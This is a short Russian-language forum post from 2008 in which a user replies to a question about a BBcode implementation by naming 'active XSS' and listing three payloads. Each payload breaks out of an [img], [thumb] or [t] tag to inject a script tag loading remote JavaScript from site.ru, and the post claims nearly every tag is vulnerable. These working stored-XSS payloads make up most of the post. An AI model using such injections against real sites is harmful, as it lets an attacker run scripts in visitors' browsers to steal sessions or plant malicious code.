04.01.2008, 22:28
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от EST a1ien
Ди и еще что думаете по поводу вот такой реализации BBcode
Нету тут нечего критического?
Активные xss
Код:
[img]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/img]
[thumb=asdf.jpg]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/thumb]
[t=asdf.jpg]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/t]
Короче говоря там активные xss почти в каждом теге есть 
Последний раз редактировалось Macro; 04.01.2008 в 22:38..
|
|
|